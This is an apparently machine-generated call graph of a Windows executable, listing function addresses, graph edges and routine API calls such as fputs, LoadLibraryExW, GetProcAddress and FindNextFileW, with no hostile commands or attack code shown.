27699->27698 27700 6a8817 27701 6a882c 27700->27701 27702 6a881c fputs 27700->27702 27846 670dcc 27701->27846 27702->27701 27704 6a8841 27705 6a8878 GetStdHandle GetConsoleScreenBufferInfo 27704->27705 27706 6a8899 27704->27706 27705->27706 27707 662130 2 API calls 27706->27707 27708 6a88ac 27707->27708 27956 6a7c40 27708->27956 27712 6a89a2 27713 6a89a7 _CxxThrowException 27712->27713 27717 6a89c3 27712->27717 27713->27717 27714 6a8a78 28000 694c2c 27714->28000 27717->27714 27718 6a8a54 _CxxThrowException 27717->27718 28021 6632bc 27717->28021 27718->27714 27719 6a8aad _CxxThrowException 27738 6a8ad1 27719->27738 27721 6a8bb3 27728 6a8c21 27721->27728 28027 66bf04 22 API calls 27721->28027 27724 66362c 6 API calls 27726 6a8a2a 27724->27726 27730 663314 3 API calls 27726->27730 27727 6a8bb8 _CxxThrowException 27727->27721 28013 662300 fputc 27728->28013 27729 6a8c00 27729->27728 27732 6a8c05 _CxxThrowException 27729->27732 27731 6a8a3f _CxxThrowException 27730->27731 27731->27718 27732->27728 27734 6a8c58 fputs 28014 662300 fputc 27734->28014 27737 6a8b98 free 27737->27721 27737->27738 27738->27721 27738->27727 27738->27737 28025 689644 11 API calls 27738->28025 28026 66e9c8 malloc _CxxThrowException memmove free memmove 27738->28026 27739 6a8cbc 28015 662300 fputc 27739->28015 27741 6a8cc4 fputs 28016 662300 fputc 27741->28016 27745 6a8cdc strlen 27747 6a8d08 27745->27747 27748 6a902b 27745->27748 28030 6a640c fputc fputs fputs fputc 27747->28030 28017 662300 fputc 27748->28017 27749 6a8c70 27749->27739 28028 6a640c fputc fputs fputs fputc 27749->28028 28029 662300 fputc 27749->28029 27752 6a903b fputs 28018 662300 fputc 27752->28018 27759 6a906d fputs fputc 27761 6a9053 27759->27761 27762 6a9096 fputc 27759->27762 27761->27759 27799 6a914d 27761->27799 28031 662670 fputs 27761->28031 27768 6a90ae fputc fputc fputc 27762->27768 27767 6a92ab 28019 662300 fputc 27767->28019 27770 6a9100 27768->27770 28032 6a63b8 fputc fputs 27770->28032 27772 6a92b3 fputs 28020 662300 fputc 27772->28020 27781 6a92e2 fputs fputc 27784 6a92cb 27781->27784 27784->27781 27822 6a9395 27784->27822 28040 6a63b8 fputc fputs 27784->28040 27787 6a9489 27798 6aa5c5 27787->27798 27800 6aa5c0 27787->27800 27793 6a91a2 fputc 27793->27799 27801 6aa5ca _CxxThrowException 27798->27801 27802 6aa5e7 free 27798->27802 27799->27767 27799->27793 27806 6a91c4 fputc 27799->27806 27816 6a91e4 fputc fputc 27799->27816 28033 6a640c fputc fputs fputs fputc 27799->28033 28034 6889f0 VariantClear 27799->28034 28035 662670 fputs 27799->28035 28044 6a66a8 30 API calls 27800->28044 27801->27802 27808 6aa626 free 27802->27808 27809 6aa605 27802->27809 27806->27799 27814 6aa63c 27808->27814 27813 6aa609 free 27809->27813 27813->27808 27813->27813 28045 6a7080 6 API calls 27814->28045 28036 688a78 VariantClear 27816->28036 27822->27787 28041 6a640c fputc fputs fputs fputc 27822->28041 28042 688d38 VariantClear 27822->28042 28043 6a63b8 fputc fputs 27822->28043 27823 6aa64a 28046 66182c free free free free free 27823->28046 27830 6a9218 28037 6a63b8 fputc fputs 27830->28037 28038 688b00 malloc _CxxThrowException free VariantClear 27830->28038 27836 6a926c fputc fputs 28039 662300 fputc 27836->28039 27840 6a928f free 27840->27767 27840->27799 27847 670df5 27846->27847 27848 670e1b 27846->27848 28110 6802a0 6 API calls 27847->28110 27850 663314 3 API calls 27848->27850 27853 670e2c 27850->27853 27851 670e09 _CxxThrowException 27851->27848 27852 670e4e free 28111 6802a0 6 API calls 27852->28111 27853->27852 27855 670e98 free 27853->27855 27858 670ede 27855->27858 27859 670ece 27855->27859 27856 670e6e _CxxThrowException 27856->27853 27861 670f29 wcscmp 27858->27861 27863 670f3e 27858->27863 27860 664b58 7 API calls 27859->27860 27860->27858 27862 670f7b 27861->27862 27861->27863 28112 6802a0 6 API calls 27862->28112 28047 66fadc 27863->28047 27865 670f8f _CxxThrowException 27865->27863 27868 66fadc 10 API calls 27869 670fee 27868->27869 27870 67102d 27869->27870 28113 670358 189 API calls 27869->28113 27876 67105c 27870->27876 28114 670358 189 API calls 27870->28114 27873 671177 28057 670160 27873->28057 27875 671130 27879 663404 4 API calls 27875->27879 27876->27873 27876->27875 28115 6802a0 6 API calls 27876->28115 27880 671141 27879->27880 27880->27873 28116 6802a0 6 API calls 27880->28116 27881 6711f1 27884 67121e 27881->27884 27886 663404 4 API calls 27881->27886 27882 67111e _CxxThrowException 27882->27875 27883 663404 4 API calls 27883->27881 28074 664b58 27884->28074 27886->27884 27888 671165 _CxxThrowException 27888->27873 27892 671871 27895 671876 27892->27895 27896 6718cf 27892->27896 27893 67159a 27894 6715e9 27893->27894 27899 671807 27893->27899 28122 6802a0 6 API calls 27893->28122 28123 670998 72 API calls 27894->28123 27903 6663d0 57 API calls 27895->27903 27900 6718d8 _CxxThrowException 27896->27900 27955 6714fb 27896->27955 27897 6712d9 28096 6663d0 27897->28096 27899->27892 27899->27955 28141 6802a0 6 API calls 27899->28141 27907 671882 27903->27907 27905 6715d7 _CxxThrowException 27905->27894 27906 6715f8 28124 66ef70 27906->28124 27909 666360 15 API calls 27907->27909 27911 67188b 27909->27911 27914 664b58 7 API calls 27911->27914 27914->27955 27915 67185f _CxxThrowException 27915->27892 27916 6713b2 27920 6713ed 27916->27920 28118 670358 189 API calls 27916->28118 27919 6713a0 _CxxThrowException 27919->27916 27929 67141f 27920->27929 28119 670358 189 API calls 27920->28119 27921 663404 4 API calls 27924 67169d 27921->27924 27923 6717a8 27926 6717ca 27923->27926 27933 663404 4 API calls 27923->27933 27928 6716c8 27924->27928 28136 663890 memmove 27924->28136 27926->27955 28140 6802a0 6 API calls 27926->28140 27927 671736 27927->27923 27936 671767 27927->27936 28138 6802a0 6 API calls 27927->28138 27928->27923 27928->27927 28137 6802a0 6 API calls 27928->28137 27930 67143e 27929->27930 28120 665164 6 API calls 27929->28120 27932 6663d0 57 API calls 27930->27932 27937 67144c 27932->27937 27933->27926 27935 671724 _CxxThrowException 27935->27927 27936->27923 28139 6802a0 6 API calls 27936->28139 28106 68408c 27937->28106 27942 6717f5 _CxxThrowException 27942->27899 27943 671755 _CxxThrowException 27943->27936 27946 666360 15 API calls 27948 671464 27946->27948 27947 671796 _CxxThrowException 27947->27923 27949 663404 4 API calls 27948->27949 27951 671483 27948->27951 27949->27951 27950 6714d9 27953 663404 4 API calls 27950->27953 27950->27955 27951->27950 27951->27955 28121 6802a0 6 API calls 27951->28121 27953->27955 27954 6714c7 _CxxThrowException 27954->27950 27955->27704 27957 663208 2 API calls 27956->27957 27958 6a7c84 27957->27958 27959 68ab74 27958->27959 27960 68aba6 27959->27960 27977 68abd3 27959->27977 27960->27977 28293 6894a8 7 API calls 27960->28293 27961 68ae31 28190 6883c8 27961->28190 27970 68ae7f 27973 68ae99 27970->27973 27974 66339c 4 API calls 27970->27974 27971 663208 malloc _CxxThrowException 27971->27977 27972 68af7a free 27972->27712 27975 6631c0 4 API calls 27973->27975 27974->27973 27976 68aeaf 27975->27976 28274 68a9fc 27976->28274 27977->27961 27977->27971 27979 663518 malloc _CxxThrowException free 27977->27979 27990 66b8f0 malloc _CxxThrowException memmove free 27977->27990 27993 68ad95 free 27977->27993 27994 68adc2 memmove 27977->27994 27996 662130 malloc _CxxThrowException 27977->27996 28294 689d98 27977->28294 28313 68a034 8 API calls 27977->28313 28314 689af0 27977->28314 28321 6894a8 7 API calls 27977->28321 27979->27977 27983 68ae7a 27983->27972 27984 68aed1 27985 6631c0 4 API calls 27984->27985 27986 68aee7 27985->27986 27988 68a9fc 126 API calls 27986->27988 27989 68aef3 free 27988->27989 27989->27983 27992 68af06 27989->27992 27990->27977 27992->27983 27998 68af38 27992->27998 27993->27977 27994->27977 27995 68af3b GetProcAddress 27995->27998 27996->27977 27998->27995 27999 68af71 27998->27999 27999->27972 27999->27983 28001 694c5c 28000->28001 28009 694c79 28000->28009 28002 694c60 free 28001->28002 28002->28002 28002->28009 28003 694d9c 28003->27719 28003->27738 28005 694d9e free 28005->28003 28007 694dac free 28007->28003 28008 662130 2 API calls 28008->28009 28009->28003 28009->28005 28009->28007 28009->28008 28010 694d63 memmove 28009->28010 28011 66b8f0 4 API calls 28009->28011 28451 669a80 malloc _CxxThrowException memmove 28009->28451 28452 68bb68 16 API calls 28009->28452 28010->28009 28012 694d86 free 28011->28012 28012->28003 28012->28009 28013->27734 28014->27749 28015->27741 28016->27745 28017->27752 28018->27761 28019->27772 28020->27784 28022 6632d0 28021->28022 28022->28022 28023 662fbc 2 API calls 28022->28023 28024 6632e4 28023->28024 28024->27724 28025->27738 28026->27738 28027->27729 28029->27749 28031->27768 28034->27799 28035->27799 28036->27830 28038->27836 28039->27840 28042->27822 28044->27798 28045->27823 28048 66fb08 28047->28048 28049 66fb00 28047->28049 28050 663314 3 API calls 28048->28050 28049->27868 28051 66fb21 28050->28051 28052 66fb3f free 28051->28052 28054 66fb4f 28051->28054 28052->28049 28056 66fbb4 free 28054->28056 28142 6802a0 6 API calls 28054->28142 28055 66fba2 _CxxThrowException 28055->28056 28056->28049 28058 67018f 28057->28058 28059 6632bc 2 API calls 28058->28059 28066 6701e4 28058->28066 28060 6701b0 28059->28060 28143 66ed8c 6 API calls 28060->28143 28061 670325 28061->27881 28061->27883 28063 6701d1 free 28063->28066 28064 6702ca 28147 6802a0 6 API calls 28064->28147 28066->28061 28066->28064 28069 6702c8 28066->28069 28144 66fec8 142 API calls 28066->28144 28145 66fd30 12 API calls 28066->28145 28146 66ed8c 6 API calls 28066->28146 28067 6702de _CxxThrowException 28067->28069 28069->28061 28148 6802a0 6 API calls 28069->28148 28073 670313 _CxxThrowException 28073->28061 28075 664b77 28074->28075 28077 664b7f 28074->28077 28086 670c20 28075->28086 28076 664bb6 28079 662130 2 API calls 28076->28079 28085 664bfd 28076->28085 28077->28076 28078 664ba1 free free 28077->28078 28078->28077 28080 664bd3 28079->28080 28082 664bef free 28080->28082 28083 664bdc memmove 28080->28083 28081 662130 2 API calls 28081->28085 28082->28085 28083->28082 28084 663314 3 API calls 28084->28085 28085->28075 28085->28081 28085->28084 28087 670d37 28086->28087 28093 670c4a 28086->28093 28087->27893 28087->27897 28088 663208 malloc _CxxThrowException 28088->28093 28089 663404 4 API calls 28089->28093 28090 66339c 4 API calls 28090->28093 28091 662130 2 API calls 28091->28093 28092 663314 malloc _CxxThrowException memmove 28092->28093 28093->28087 28093->28088 28093->28089 28093->28090 28093->28091 28093->28092 28094 66b8f0 4 API calls 28093->28094 28095 670d0d free free 28094->28095 28095->28087 28095->28093 28097 6663e5 28096->28097 28098 666419 28096->28098 28097->28098 28149 665d18 55 API calls 28097->28149 28099 666451 28098->28099 28101 66643c free free 28098->28101 28102 666360 28099->28102 28101->28098 28104 666379 28102->28104 28103 6663c4 28103->27916 28117 6802a0 6 API calls 28103->28117 28104->28103 28150 665bbc 15 API calls 28104->28150 28107 671458 28106->28107 28109 68409e 28106->28109 28107->27946 28109->28107 28151 683e14 28109->28151 28110->27851 28111->27856 28112->27865 28113->27870 28114->27876 28115->27882 28116->27888 28117->27919 28118->27920 28119->27929 28120->27930 28121->27954 28122->27905 28123->27906 28126 66ef99 28124->28126 28128 66ef91 28124->28128 28125 66efd9 28127 662130 2 API calls 28125->28127 28135 66f020 28125->28135 28126->28125 28129 66efbb free free free 28126->28129 28130 66eff6 28127->28130 28128->27921 28128->27928 28129->28126 28131 66f012 free 28130->28131 28132 66efff memmove 28130->28132 28131->28135 28132->28131 28133 662130 2 API calls 28133->28135 28134 663314 malloc _CxxThrowException memmove 28134->28135 28135->28128 28135->28133 28135->28134 28136->27928 28137->27935 28138->27943 28139->27947 28140->27942 28141->27915 28142->28055 28143->28063 28144->28066 28145->28066 28146->28066 28147->28067 28148->28073 28149->28097 28150->28104 28169 681370 28151->28169 28154 681370 96 API calls 28159 683e45 28154->28159 28155 684043 28155->28109 28157 66318c 4 API calls 28158 683fdd 28157->28158 28158->28155 28158->28157 28163 683e14 105 API calls 28158->28163 28189 67ff04 malloc _CxxThrowException memmove 28158->28189 28166 683ea2 28159->28166 28173 6801a8 28159->28173 28162 66520c malloc _CxxThrowException memmove memmove free 28162->28166 28164 684022 free free 28163->28164 28164->28155 28164->28158 28165 683f6b memmove 28165->28166 28166->28158 28166->28162 28166->28165 28187 662748 CharUpperW CharUpperW 28166->28187 28188 665424 6 API calls 28166->28188 28170 681388 28169->28170 28171 6813dd 28169->28171 28170->28171 28172 6801a8 96 API calls 28170->28172 28171->28154 28172->28170 28174 680259 28173->28174 28175 6801c8 28173->28175 28174->28159 28175->28174 28176 663208 2 API calls 28175->28176 28177 6801ec 28176->28177 28178 66318c 4 API calls 28177->28178 28179 6801fd 28178->28179 28180 68020c free free 28179->28180 28181 680223 28179->28181 28180->28174 28182 667ebc 90 API calls 28181->28182 28183 680232 28182->28183 28184 680244 free free 28183->28184 28185 663404 4 API calls 28183->28185 28184->28174 28186 680243 28185->28186 28186->28184 28187->28166 28189->28158 28322 666570 28190->28322 28193 6631c0 4 API calls 28194 688406 28193->28194 28329 668624 28194->28329 28196 68841b 28197 6631c0 4 API calls 28196->28197 28217 688479 28196->28217 28200 688435 28197->28200 28198 688499 28201 6884ad 28198->28201 28202 68849f free 28198->28202 28199 68848b free 28199->28198 28335 6686dc 91 API calls 28200->28335 28204 6884bd 28201->28204 28205 6884b3 free 28201->28205 28202->28201 28207 6885ef 28204->28207 28209 663208 2 API calls 28204->28209 28205->28204 28206 68844a 28210 6631c0 4 API calls 28206->28210 28206->28217 28208 663314 3 API calls 28207->28208 28211 6885fc free 28208->28211 28212 6884d0 28209->28212 28213 688464 28210->28213 28215 68860a 28211->28215 28337 688290 102 API calls 28212->28337 28336 6686dc 91 API calls 28213->28336 28241 6631c0 28215->28241 28217->28198 28217->28199 28218 6884ec 28219 68851b 28218->28219 28220 6884f0 28218->28220 28338 688290 102 API calls 28219->28338 28221 663314 3 API calls 28220->28221 28223 6884fd free free 28221->28223 28223->28215 28224 688536 28225 68853a 28224->28225 28226 688565 28224->28226 28227 663314 3 API calls 28225->28227 28339 688290 102 API calls 28226->28339 28229 688547 free free 28227->28229 28229->28215 28230 688579 28231 68857d 28230->28231 28232 6885a5 28230->28232 28234 663314 3 API calls 28231->28234 28340 688290 102 API calls 28232->28340 28236 68858a free free 28234->28236 28235 6885b9 28237 6885bd 28235->28237 28238 6885e5 free 28235->28238 28236->28215 28239 663314 3 API calls 28237->28239 28238->28207 28240 6885ca free free 28239->28240 28240->28215 28242 6631d8 28241->28242 28243 66312c 4 API calls 28242->28243 28244 6631fe 28243->28244 28245 68a7fc 28244->28245 28246 68a822 28245->28246 28247 68a872 28246->28247 28402 666490 FreeLibrary LoadLibraryExW 28246->28402 28346 68996c 28247->28346 28250 68a84d 28252 68a851 28250->28252 28253 68a865 28250->28253 28255 666464 FreeLibrary 28252->28255 28256 666464 FreeLibrary 28253->28256 28254 663404 4 API calls 28257 68a893 28254->28257 28260 68a85e free 28255->28260 28256->28247 28353 6664d4 28257->28353 28260->27970 28260->27983 28261 68a8bf GetProcAddress 28262 68a8d7 28261->28262 28264 68a8d5 28261->28264 28265 68a8fd GetProcAddress 28262->28265 28266 68a8dd GetProcAddress 28262->28266 28263 68a981 free 28267 666464 FreeLibrary 28263->28267 28264->28262 28358 6891e0 GetProcAddress GetProcAddress GetProcAddress 28265->28358 28266->28265 28269 68a8f3 28266->28269 28270 68a993 free 28267->28270 28268 68a945 28268->28260 28268->28263 28269->28265 28270->28260 28275 663208 2 API calls 28274->28275 28276 68aa29 28275->28276 28277 667df4 4 API calls 28276->28277 28278 68aa37 28277->28278 28279 663208 2 API calls 28278->28279 28280 68aa4b 28279->28280 28409 667e34 28280->28409 28282 68aac0 free 28283 68aacd free 28282->28283 28286 66794c FindClose 28283->28286 28284 68aa5b 28284->28282 28285 667e34 40 API calls 28284->28285 28287 66318c 4 API calls 28284->28287 28289 68a7fc 82 API calls 28284->28289 28290 68aab1 28284->28290 28285->28284 28288 68aae1 free 28286->28288 28287->28284 28288->27983 28288->27984 28291 68aa8e free 28289->28291 28290->28282 28291->28284 28292 68aab3 free 28291->28292 28292->28283 28416 689bcc 28294->28416 28297 689bcc 9 API calls 28310 689df2 28297->28310 28298 689ee9 28299 689f25 free 28298->28299 28303 689f0f free free 28298->28303 28300 689f5b 28299->28300 28301 689f33 28299->28301 28301->28300 28304 689f46 free free 28301->28304 28302 663208 malloc _CxxThrowException 28302->28310 28303->28298 28304->28301 28305 663404 4 API calls 28305->28310 28306 663404 4 API calls 28308 689e5a wcscmp 28306->28308 28307 662130 2 API calls 28307->28310 28308->28310 28309 663314 malloc _CxxThrowException memmove 28309->28310 28310->28298 28310->28302 28310->28305 28310->28306 28310->28307 28310->28309 28311 66b8f0 4 API calls 28310->28311 28312 689ec4 free free 28311->28312 28312->28298 28312->28310 28313->27977 28315 663314 3 API calls 28314->28315 28316 689b2b 28315->28316 28436 688f60 28316->28436 28323 663208 2 API calls 28322->28323 28324 666593 28323->28324 28341 66650c GetModuleFileNameW 28324->28341 28326 6665a3 28327 6665dd 28326->28327 28345 663518 malloc _CxxThrowException free 28326->28345 28327->28193 28330 663208 2 API calls 28329->28330 28331 668683 28330->28331 28332 667ebc 90 API calls 28331->28332 28333 668691 free 28332->28333 28333->28196 28335->28206 28336->28217 28337->28218 28338->28224 28339->28230 28340->28235 28342 66654d 28341->28342 28344 66655e 28341->28344 28343 66339c 4 API calls 28342->28343 28342->28344 28343->28344 28344->28326 28345->28327 28347 662130 2 API calls 28346->28347 28348 689989 28347->28348 28349 6899a6 28348->28349 28350 663208 2 API calls 28348->28350 28351 66b8f0 4 API calls 28349->28351 28350->28349 28352 6899e5 28351->28352 28352->28254 28354 666464 FreeLibrary 28353->28354 28355 6664e7 28354->28355 28356 6664f1 LoadLibraryExW 28355->28356 28357 6664ed 28355->28357 28356->28357 28357->28261 28357->28262 28357->28268 28359 689312 GetProcAddress 28358->28359 28360 689242 GetProcAddress 28358->28360 28361 689370 28359->28361 28368 689327 28359->28368 28364 689262 28360->28364 28362 689372 28361->28362 28362->28268 28369 68a180 GetProcAddress GetProcAddress 28362->28369 28363 6886e0 VariantClear SysStringByteLen 28363->28364 28364->28359 28364->28362 28364->28363 28365 6892e0 memmove 28364->28365 28403 688e6c malloc _CxxThrowException memmove free memmove 28365->28403 28368->28361 28368->28362 28404 688eec malloc _CxxThrowException memmove free 28368->28404 28370 68a1eb GetProcAddress 28369->28370 28371 68a214 GetProcAddress 28369->28371 28373 68a200 28370->28373 28379 68a233 28370->28379 28372 68a20f 28371->28372 28371->28379 28376 68a643 28372->28376 28373->28372 28373->28379 28374 663208 malloc _CxxThrowException 28374->28379 28376->28268 28377 68a36f SysStringByteLen 28378 68a64d 28377->28378 28377->28379 28380 66ae2c VariantClear 28378->28380 28379->28374 28379->28376 28379->28377 28381 66ae2c VariantClear 28379->28381 28382 6894a8 7 API calls 28379->28382 28383 68a648 28379->28383 28384 68a662 free free 28379->28384 28385 688928 malloc _CxxThrowException SysStringLen free VariantClear 28379->28385 28386 68a67d free free 28379->28386 28387 689d98 19 API calls 28379->28387 28388 68a698 free free 28379->28388 28389 689380 7 API calls 28379->28389 28390 6887a8 VariantClear 28379->28390 28391 68a6b0 free free free 28379->28391 28393 68a6d3 free free free 28379->28393 28395 688860 VariantClear 28379->28395 28396 68a6f6 free free free 28379->28396 28397 662130 2 API calls 28379->28397 28398 689af0 4 API calls 28379->28398 28399 66b8f0 4 API calls 28379->28399 28405 6898d4 malloc _CxxThrowException memmove 28379->28405 28406 68a034 8 API calls 28379->28406 28380->28383 28381->28379 28382->28379 28408 6894a8 7 API calls 28383->28408 28384->28383 28385->28379 28386->28383 28387->28379 28388->28383 28389->28379 28390->28379 28391->28383 28393->28383 28395->28379 28396->28383 28397->28379 28398->28379 28400 68a607 free free free 28399->28400 28407 6894a8 7 API calls 28400->28407 28402->28250 28403->28364 28404->28368 28406->28379 28413 667e41 28409->28413 28410 667e4a 28410->28413 28415 667a90 malloc _CxxThrowException free memmove FindNextFileW 28410->28415 28412 667978 39 API calls 28412->28413 28413->28410 28413->28412 28414 667e70 28413->28414 28414->28284 28415->28410 28417 689c22 28416->28417 28418 689bf5 28416->28418 28419 663208 2 API calls 28417->28419 28418->28417 28421 689c0d free free 28418->28421 28420 689c2f 28419->28420 28422 689c36 free 28420->28422 28434 689c45 28420->28434 28421->28418 28423 689d2f 28422->28423 28423->28297 28424 689ce8 28425 689d25 free 28424->28425 28426 662130 2 API calls 28424->28426 28425->28423 28428 689cfc 28426->28428 28427 662130 2 API calls 28427->28434 28429 689d16 28428->28429 28431 663314 3 API calls 28428->28431 28430 66b8f0 4 API calls 28429->28430 28432 689d24 28430->28432 28431->28429 28432->28425 28433 663314 3 API calls 28433->28434 28434->28424 28434->28427 28434->28433 28435 66b8f0 4 API calls 28434->28435 28435->28434 28437 688f9c 28436->28437 28442 688fa8 28436->28442 28438 662130 2 API calls 28437->28438 28438->28442 28439 68900a 28443 689078 28439->28443 28440 662130 2 API calls 28440->28442 28441 663314 malloc _CxxThrowException memmove 28441->28442 28442->28439 28442->28440 28442->28441 28444 6890b6 28443->28444 28448 6890c2 28443->28448 28445 662130 2 API calls 28444->28445 28445->28448 28446 68913f 28446->27977 28447 662130 2 API calls 28447->28448 28448->28446 28448->28447 28449 662130 2 API calls 28448->28449 28450 689110 memmove 28449->28450 28450->28448 28451->28009 28452->28009 28453 66c858 28454 66c865 28453->28454 28455 66c870 28453->28455 28457 66cdf4 28454->28457 28462 66c704 28457->28462 28465 6ad4a0 VirtualFree 28462->28465 28464 66c74e 28465->28464 28466 66cb78 28471 668c38 28466->28471 28469 66cbb5 28470 66cba8 GetLastError 28470->28469 28473 668c54 28471->28473 28474 668c87 28473->28474 28475 668bf0 WriteFile 28473->28475 28474->28469 28474->28470 28475->28473 28476 674418 28477 674458 28476->28477 28854 68ec5c 28477->28854 28480 674587 28483 6745aa 28480->28483 28484 674596 28480->28484 28481 674575 28482 66ae2c VariantClear 28481->28482 28561 67457f 28482->28561 28485 66ae2c VariantClear 28483->28485 28486 66ae2c VariantClear 28484->28486 28487 6745c7 28485->28487 28486->28561 28488 674606 28487->28488 28489 674618 28487->28489 28490 66ae2c VariantClear 28488->28490 28491 674640 28489->28491 28492 674620 28489->28492 28490->28561 28494 674647 28491->28494 28495 67463e 28491->28495 28918 6634c0 malloc _CxxThrowException SysStringLen free 28492->28918 28496 66ae2c VariantClear 28494->28496 28497 66ae2c VariantClear 28495->28497 28496->28561 28498 674665 28497->28498 28499 6746a4 28498->28499 28500 674692 28498->28500 28502 6746cc 28499->28502 28503 6746ac 28499->28503 28501 66ae2c VariantClear 28500->28501 28501->28561 28505 6746ca 28502->28505 28506 6746d3 28502->28506 28919 6634c0 malloc _CxxThrowException SysStringLen free 28503->28919 28508 66ae2c VariantClear 28505->28508 28507 66ae2c VariantClear 28506->28507 28507->28561 28511 6746f1 28508->28511 28509 6749c6 28888 68b204 28509->28888 28515 663208 2 API calls 28511->28515 28516 674842 28511->28516 28511->28561 28512 6748b8 28512->28509 28924 664d78 10 API calls 28512->28924 28518 67476e 28515->28518 28516->28512 28522 674890 28516->28522 28922 663918 memmove 28516->28922 28517 68c59c VariantClear 28528 674a03 28517->28528 28520 663208 2 API calls 28518->28520 28523 67478a 28520->28523 28521 67493f 28525 674954 28521->28525 28926 6730dc free free memmove 28521->28926 28522->28512 28923 663918 memmove 28522->28923 28529 663208 2 API calls 28523->28529 28527 6863cc 6 API calls 28525->28527 28531 674963 28527->28531 28536 674a45 28528->28536 28528->28561 28927 674210 29 API calls 28528->28927 28533 674798 28529->28533 28535 663404 4 API calls 28531->28535 28920 6692d4 malloc _CxxThrowException _CxxThrowException free 28533->28920 28534 6748fd 28534->28521 28534->28525 28925 664338 CharUpperW CharUpperW wcscmp 28534->28925 28539 674973 free 28535->28539 28542 674a65 28536->28542 28536->28561 28570 674aad 28536->28570 28537 674aa0 28543 674db2 28537->28543 28544 674c6f 28537->28544 28541 674992 28539->28541 28540 6747c5 28545 67481d free free free 28540->28545 28921 669444 malloc _CxxThrowException memmove memmove 28540->28921 28546 6749c1 free 28541->28546 28552 6749a9 free free 28541->28552 28542->28537 28928 6730dc free free memmove 28542->28928 28556 674de2 28543->28556 28557 674e2c 28543->28557 28543->28561 28553 662130 2 API calls 28544->28553 28563 674c82 28544->28563 28545->28516 28546->28509 28547 674ae1 28547->28561 28930 6730dc free free memmove 28547->28930 28551 6747e1 28555 663404 4 API calls 28551->28555 28552->28541 28553->28563 28554 6863cc 6 API calls 28567 674cf7 28554->28567 28558 6747f1 free 28555->28558 28559 662130 2 API calls 28556->28559 28564 674e70 28557->28564 28565 674e5d 28557->28565 28558->28545 28559->28561 28560 674d65 free 28560->28561 28563->28554 28571 674e78 28564->28571 28572 6765de 28564->28572 28569 66ae2c VariantClear 28565->28569 28567->28560 28568 66362c 6 API calls 28567->28568 28568->28560 28569->28561 28570->28547 28570->28561 28929 664338 CharUpperW CharUpperW wcscmp 28570->28929 28573 66ae2c VariantClear 28571->28573 28574 66ae2c VariantClear 28572->28574 28575 674ea7 28573->28575 28574->28561 28892 671fcc 28575->28892 28578 671fcc VariantClear 28579 674f03 28578->28579 28579->28561 28580 671fcc VariantClear 28579->28580 28581 674f30 28580->28581 28581->28561 28582 68b204 VariantClear 28581->28582 28583 674f5e 28582->28583 28583->28561 28585 674fa7 28583->28585 28931 686484 20 API calls 28583->28931 28586 6750ea 28585->28586 28588 663314 3 API calls 28585->28588 28896 6863cc 28586->28896 28589 674fc5 28588->28589 28932 686154 malloc _CxxThrowException free 28589->28932 28590 675264 28593 663314 3 API calls 28590->28593 28592 67513a 28592->28590 28601 663208 2 API calls 28592->28601 28596 675276 28593->28596 28594 674fd0 28597 674fe4 28594->28597 28598 675032 28594->28598 28613 6752be 28596->28613 28935 671b60 7 API calls 28596->28935 28599 662130 2 API calls 28597->28599 28615 675013 28598->28615 28933 664938 wcscmp 28598->28933 28602 674fee 28599->28602 28600 675129 free free 28600->28592 28603 675153 28601->28603 28606 675003 28602->28606 28611 663208 2 API calls 28602->28611 28934 672b54 42 API calls 28603->28934 28617 66b8f0 4 API calls 28606->28617 28608 675043 28608->28615 28619 662130 2 API calls 28608->28619 28609 6752a5 28614 663404 4 API calls 28609->28614 28610 66362c 6 API calls 28616 6750d8 free 28610->28616 28611->28606 28612 675164 28618 67525a free 28612->28618 28622 662130 2 API calls 28612->28622 28621 6753ec 28613->28621 28628 663208 2 API calls 28613->28628 28620 6752b3 free 28614->28620 28615->28610 28616->28586 28617->28615 28618->28590 28624 675052 28619->28624 28620->28613 28623 675400 28621->28623 28638 675461 28621->28638 28625 67517b 28622->28625 28626 663404 4 API calls 28623->28626 28627 675067 28624->28627 28632 663208 2 API calls 28624->28632 28630 675194 28625->28630 28634 663208 2 API calls 28625->28634 28631 675411 28626->28631 28637 66b8f0 4 API calls 28627->28637 28644 6752e8 free 28628->28644 28629 675c23 28633 663404 4 API calls 28629->28633 28641 66b8f0 4 API calls 28630->28641 28635 675427 28631->28635 28937 66695c 39 API calls 28631->28937 28632->28627 28636 675c34 28633->28636 28634->28630 28635->28629 28640 675433 free free 28635->28640 28648 663208 2 API calls 28636->28648 28655 67606d 28636->28655 28764 676557 free free 28636->28764 28637->28615 28638->28629 28642 663208 2 API calls 28638->28642 28640->28561 28671 6751a8 28641->28671 28645 675488 28642->28645 28644->28621 28646 67536b 28644->28646 28649 667ebc 90 API calls 28645->28649 28651 663404 4 API calls 28646->28651 28652 675c5b 28648->28652 28650 67549b 28649->28650 28653 6754a4 28650->28653 28669 675b62 28650->28669 28654 675387 28651->28654 28656 675c93 28652->28656 28949 671afc malloc _CxxThrowException memmove 28652->28949 28658 6754f3 28653->28658 28659 6754ae 28653->28659 28666 663314 3 API calls 28654->28666 28725 676197 28655->28725 28655->28764 28961 671924 VariantClear _CxxThrowException _CxxThrowException 28655->28961 28657 66362c 6 API calls 28656->28657 28663 675ca7 28657->28663 28938 6718f8 malloc _CxxThrowException memmove 28658->28938 28664 6754b7 free free free 28659->28664 28665 67576f 28659->28665 28661 662130 2 API calls 28693 67625a 28661->28693 28950 672c58 19 API calls 28663->28950 28664->28561 28675 675836 28665->28675 28676 67577e 28665->28676 28674 6753c7 28666->28674 28667 6760c2 28677 6760c9 free free 28667->28677 28715 6760f8 28667->28715 28668 675c77 28678 663404 4 API calls 28668->28678 28670 675c16 free 28669->28670 28687 663314 3 API calls 28669->28687 28670->28629 28673 663404 4 API calls 28671->28673 28680 675251 28673->28680 28936 686154 malloc _CxxThrowException free 28674->28936 28684 6759e4 28675->28684 28685 67583f 28675->28685 28939 66c54c 94 API calls 28676->28939 28677->28561 28686 675c88 free 28678->28686 28679 675cb4 28688 675cb9 28679->28688 28689 675d18 28679->28689 28680->28618 28694 6759f6 28684->28694 28695 675a9b 28684->28695 28696 663314 3 API calls 28685->28696 28686->28656 28730 675b9a 28687->28730 28951 672094 7 API calls 28688->28951 28699 663208 2 API calls 28689->28699 28690 675510 28700 66318c 4 API calls 28690->28700 28691 6753d2 28701 66362c 6 API calls 28691->28701 28692 675788 28703 675826 28692->28703 28704 675791 28692->28704 28912 669220 28693->28912 28945 66695c 39 API calls 28694->28945 28702 668624 91 API calls 28695->28702 28697 67584e 28696->28697 28941 66c54c 94 API calls 28697->28941 28710 675d22 28699->28710 28711 675526 free 28700->28711 28712 6753e1 free 28701->28712 28713 675aa5 28702->28713 28703->28670 28940 672094 7 API calls 28704->28940 28707 675a00 